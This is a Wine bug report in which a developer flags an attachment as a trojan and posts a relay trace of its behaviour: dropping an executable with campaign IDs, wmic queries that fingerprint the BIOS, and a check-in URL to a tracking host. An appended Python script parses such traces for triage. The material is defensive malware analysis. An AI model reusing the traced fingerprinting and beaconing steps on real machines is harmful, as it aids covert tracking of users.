https://bugs.winehq.org/show_bug.cgi?id=37365
Anastasius Focht focht@gmx.net changed:
What                |Removed                     |Added
----------------------------------------------------------------------------
Status              |UNCONFIRMED                 |RESOLVED
CC                  |                            |focht@gmx.net
Resolution          |---                         |INVALID
Summary             |itune                       |spam/malware
--- Comment #1 from Anastasius Focht focht@gmx.net ---

Hello folks,
invalid.
Wine's trace capability is also good for analysing malware .. kinda stupid code though.
--- snip ---
...
0035:Call KERNEL32.CreateProcessA(00000000,00409b80 "C:\users\focht\Temp\baccabebbbha.exe /PID=10096 /SUBPID=0 /NETWORKID=1 /DISTID=19132 /CID=0 /PRODUCT_ID=13577 /SERVER_URL=`omn7).`ip`[o're_,]pnn%ok_`e-_ok /CLICKID= /D1=4 /D2=-1 /D3=-1 /D4=-1 /D5=-1 /PRODUCT_PRIVACY= /PRODUCT_EULA= /PRODUCT_NAME=aOnlbm /EXE_URL=`omnp4.+sc^mm^+^johdlg\)Znmfd*cmh'"...,00000000,00000000,00000000,00000000,00000000,00000000,0042bfe8,0033fa74) ret=00405297
...
0037:Call KERNEL32.__wine_kernel_init() ret=7bc5a089
0035:Ret KERNEL32.CreateProcessA() retval=00000001 ret=00405297
0035:Call KERNEL32.CloseHandle(00000068) ret=004052a4
0035:Ret KERNEL32.CloseHandle() retval=00000001 ret=004052a4
0035:Call KERNEL32.WaitForSingleObject(00000064,00000064) ret=00401e57
...
0037:Call KERNEL32.CreateProcessW(00000000,004d78e8 L"wmic /output:C:\users\focht\Temp\91412521814.aaa bios get serialnumber",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146
...
0039:Call KERNEL32.__wine_kernel_init() ret=7bc5a089
0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146
...
0039:Starting process L"C:\windows\system32\wmic.exe" (entryproc=0x7edfc33c)
...
Error: Command line not supported
...
0039:Call KERNEL32.ExitProcess(ffffffff) ret=7edfc3ca
...
0037:Call KERNEL32.CreateProcessW(00000000,004d8a38 L"wmic /output:C:\users\focht\Temp\91412521814.aaa bios get version",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146
...
003b:Call KERNEL32.__wine_kernel_init() ret=7bc5a089
0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146
...
0037:Call winhttp.WinHttpCrackUrl(004d9648 L"http://direct.the-apps-track.com/Installer/Flow?pubid=10096&distid=19132...) ret=00477b6c
...
--- snip ---
Admin, please delete the attachment; it's malware (trojan/backdoor).
... or do you want me to make this malware work perfectly with Wine? :)
Regards
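The relay trace above is exactly the kind of artifact an analyst would want to triage mechanically: which child processes the sample spawns, what it asks WMI for, and where it phones home. The following helper is an added example for this page, not code from the reporter or the Wine project. It parses Wine `+relay` "Call" lines for CreateProcessA/W, ExitProcess and WinHttpCrackUrl, pulls the `/KEY=VALUE` switches off the dropped executable's command line, lists the `wmic ... bios get ...` fingerprinting queries with their output file, and cross-references URL query parameters against those switches. The sample lines are constructed from the posted trace (argument lists shortened); the `cid=0` query parameter and the `Spawn`/`TraceSummary` names are assumptions made for the example. The observation it makes explicit is already in the trace: the `pubid`/`distid` values in the check-in URL are the `/PID`/`/DISTID` values the dropper was launched with.

```python
"""Offline triage of a Wine +relay trace (added example, not from the report)."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit, parse_qsl

# Constructed sample, modelled on the relay trace in the report with the
# argument lists shortened. Not a real capture.
SAMPLE_TRACE = r'''
0035:Call KERNEL32.CreateProcessA(00000000,00409b80 "C:\users\focht\Temp\baccabebbbha.exe /PID=10096 /SUBPID=0 /NETWORKID=1 /DISTID=19132 /CID=0 /PRODUCT_ID=13577 /D1=4 /D2=-1 /EXE_URL=`omnp4.+sc^mm^+^johdlg\)Znmfd*cmh'"...,00000000,00000000,00000000,00000000,00000000,00000000,0042bfe8,0033fa74) ret=00405297
0035:Ret KERNEL32.CreateProcessA() retval=00000001 ret=00405297
0037:Call KERNEL32.CreateProcessW(00000000,004d78e8 L"wmic /output:C:\users\focht\Temp\91412521814.aaa bios get serialnumber",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146
0039:Starting process L"C:\windows\system32\wmic.exe" (entryproc=0x7edfc33c)
0039:Call KERNEL32.ExitProcess(ffffffff) ret=7edfc3ca
0037:Call KERNEL32.CreateProcessW(00000000,004d8a38 L"wmic /output:C:\users\focht\Temp\91412521814.aaa bios get version",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146
0037:Call winhttp.WinHttpCrackUrl(004d9648 L"http://direct.the-apps-track.com/Installer/Flow?pubid=10096&distid=19132&cid=0",00000000,00000000,0033e8c0) ret=00477b6c
'''

# One relay "Call" line: thread id, DLL.function, argument list, return address.
CALL_RE = re.compile(
    r'^(?P<tid>[0-9a-f]{4}):Call (?P<func>[\w.]+)\((?P<args>.*)\) ret=(?P<ret>[0-9a-f]+)$')
# A quoted argument, ANSI "..." or wide L"...". Wine's debugstr quoting escapes
# embedded quotes and backslashes, so a backslash always pairs with the next char.
QUOTED_RE = re.compile(r'L?"((?:[^"\\]|\\.)*)"')
# /KEY=VALUE switches as passed to the dropped executable (wmic's /output: has no '=').
SWITCH_RE = re.compile(r'/([A-Z][A-Z0-9_]*)=(\S*)')


@dataclass
class Spawn:
    tid: str       # thread that called CreateProcess
    cmdline: str   # lpCommandLine as printed by the relay


@dataclass
class TraceSummary:
    spawns: list = field(default_factory=list)
    exits: list = field(default_factory=list)   # (tid, exit code)
    urls: list = field(default_factory=list)


def unescape(s):
    """Undo debugstr quoting of \\" and \\\\ inside a relay string."""
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_relay(text):
    """Collect process creations, exits and WinHTTP URLs from +relay output."""
    summary = TraceSummary()
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue
        tid, func, args = m['tid'], m['func'], m['args']
        if func in ('KERNEL32.CreateProcessA', 'KERNEL32.CreateProcessW'):
            quoted = QUOTED_RE.findall(args)
            # lpApplicationName is the first argument; when it is NULL the first
            # quoted string is lpCommandLine, otherwise it is the second one.
            idx = 0 if args.startswith('00000000,') else 1
            if len(quoted) > idx:
                summary.spawns.append(Spawn(tid, unescape(quoted[idx])))
        elif func == 'KERNEL32.ExitProcess':
            summary.exits.append((tid, int(args, 16)))
        elif func == 'winhttp.WinHttpCrackUrl':
            q = QUOTED_RE.search(args)
            if q:
                summary.urls.append(unescape(q.group(1)))
    return summary


def parse_switches(cmdline):
    """Turn '/KEY=VALUE' switches into a dict (empty values are kept)."""
    return dict(SWITCH_RE.findall(cmdline))


def wmi_queries(summary):
    """(query, output file) for each wmic invocation; 'bios get serialnumber'
    style queries are a classic machine-fingerprinting step."""
    out = []
    for s in summary.spawns:
        toks = s.cmdline.split()
        if not toks or toks[0].lower() not in ('wmic', 'wmic.exe'):
            continue
        outfile = next((t.split(':', 1)[1] for t in toks
                        if t.lower().startswith('/output:')), None)
        query = ' '.join(t for t in toks[1:] if not t.startswith('/'))
        out.append((query, outfile))
    return out


def correlate(summary):
    """Match query-string parameters of contacted URLs against the /KEY=VALUE
    switches of spawned processes. A shared value ties the check-in request
    to the campaign identifiers the dropper was launched with."""
    by_value = {}
    for s in summary.spawns:
        for key, val in parse_switches(s.cmdline).items():
            if len(val) >= 2:          # '0'/'1'/'4' collide with everything
                by_value.setdefault(val, set()).add(key)
    hits = []
    for url in summary.urls:
        for param, val in parse_qsl(urlsplit(url).query):
            for key in sorted(by_value.get(val, ())):
                hits.append((param, key, val))
    return hits


if __name__ == '__main__':
    s = parse_relay(SAMPLE_TRACE)
    for sp in s.spawns:
        print(f'[{sp.tid}] spawn: {sp.cmdline[:80]}')
    print('wmi:', wmi_queries(s))
    print('urls:', s.urls)
    print('url<->switch:', correlate(s))
```

Point it at a full `WINEDEBUG=+relay` log (stderr of the run) instead of `SAMPLE_TRACE` to get the same summary for a real sample; the ExitProcess codes let you spot the wmic children that bailed out under Wine, as they do in the posted trace.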